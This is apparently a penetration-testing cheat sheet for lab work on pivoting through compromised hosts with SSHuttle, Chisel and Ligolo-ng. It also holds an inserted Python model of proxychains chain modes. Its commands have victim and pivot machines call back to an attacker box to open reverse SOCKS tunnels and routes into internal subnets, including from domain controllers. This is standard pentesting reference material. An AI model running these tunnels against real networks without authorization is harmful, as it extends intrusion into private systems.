Pivoting - Cheat Sheet
Part 1, pivoting introduction and using SSHuttle
Part 2, pivoting with Chisel
Part 3, pivoting with Ligolo-ng
SSHuttle
sshuttle -r root@<victim> <distant network> -x <victim eth2> --ssh-cmd 'ssh -i id_rsa.key'
Chisel
Make sure to use the same versions, on target and host machines!
# Attacking Box:
./chisel server -p 80 --reverse
# Victim Box (the IP is that of our Kali machine):
./chisel.exe client 10.10.14.18:80 R:socks
Place this into /etc/proxychains4.conf:
socks5 127.0.0.1 1080
Triple Pivoting (Oh My!)
On Kali:
./chisel server -p 80 --reverse
First pivot box:
./chisel client 10.10.14.228:80 R:1080:socks
Second pivot box:
./chisel client 10.10.14.228:80 R:2080:socks
Third pivot box:
./chisel client 10.10.14.228:80 R:3080:socks
Change /etc/proxychains4.conf:
# Change to Dynamic Chain:
#strict_chain
dynamic_chain
# Add our chisel proxies
socks5 127.0.0.1 3080
socks5 127.0.0.1 2080
socks5 127.0.0.1 1080
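To see what switching from strict_chain to dynamic_chain actually changes, here is an added Python model (not part of proxychains or of this cheat sheet) that parses the config above and builds the chain under each mode; the `alive` map is a constructed stand-in for the liveness check proxychains performs on each proxy.

```python
# Model of proxychains chain selection: strict_chain needs every listed
# proxy to be up, dynamic_chain keeps the listed order but skips dead ones.
# Added example; the config text is the one from this cheat sheet.

PROXYCHAINS_CONF = """\
# Change to Dynamic Chain:
#strict_chain
dynamic_chain
# Add our chisel proxies
socks5 127.0.0.1 3080
socks5 127.0.0.1 2080
socks5 127.0.0.1 1080
"""

CHAIN_MODES = ("strict_chain", "dynamic_chain", "random_chain", "round_robin_chain")
PROXY_TYPES = ("socks4", "socks5", "http")


def parse_conf(text):
    """Return (mode, proxies) from proxychains.conf text; comments are ignored."""
    mode = None
    proxies = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        if line in CHAIN_MODES:
            mode = line
            continue
        parts = line.split()
        if len(parts) >= 3 and parts[0] in PROXY_TYPES:
            proxies.append((parts[0], parts[1], int(parts[2])))
    return mode, proxies


def build_chain(mode, proxies, alive):
    """Return the proxies a connection would traverse, or None if the chain fails.

    `alive` maps (host, port) -> bool and stands in for the liveness probe
    (constructed for this example, not a proxychains API).
    """
    up = [px for px in proxies if alive.get((px[1], px[2]), False)]
    if mode == "strict_chain":
        return proxies if len(up) == len(proxies) else None  # all or nothing
    if mode == "dynamic_chain":
        return up or None  # dead hops skipped, at least one must be up
    raise ValueError(f"unsupported chain mode: {mode}")
```

With one chisel listener down, strict_chain refuses every connection while dynamic_chain still routes through the remaining hops in their listed order.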
Ligolo-ng
To setup ligolo-ng, on Kali:
# This will create a new TUN interface
sudo ip tuntap add user [your_username] mode tun ligolo
# This will bring the link on the new interface up
sudo ip link set ligolo up
# This will add a route to the new tunnel.
# NOTE this is where you insert the new subnet you want to access.
sudo ip route add 172.16.5.0/24 dev ligolo
Once added, we can run the proxy on Kali:
./proxy -selfcert
Then, from the Pivot machine, we can run the agent command:
./agent -connect 10.10.14.10:11601 -ignore-cert
On our Proxy on Kali, we should see a connection back:
WARN[0000] Using automatically generated self-signed certificates (Not recommended)
INFO[0000] Listening on 0.0.0.0:11601
Made in France ♥ by @Nicocha30!
ligolo-ng » INFO[0024] Agent joined. name="DOMAIN\\Administrator@DC01" remote="10.10.110.3:49821"
We can then run the session and start commands:
ligolo-ng » session
? Specify a session : 1 - DOMAIN\Administrator@DC01 - 10.10.110.3:49821
[Agent : DOMAIN\Administrator@DC01] » start
[Agent : DOMAIN\Administrator@DC01] » INFO[0359] Starting tunnel to CORP\Administrator@DC01
Double Pivoting
Once we have multiple agents, we can quickly switch between them with the session command:
[Agent : DEV\Administrator@DC02] » session
? Specify a session : [Use arrows to move, type to filter]
> 6 - DOMAIN\Administrator@DC01 - 10.10.110.3:18115
7 - DOMAIN\Administrator@DC02 - 10.10.110.3:33051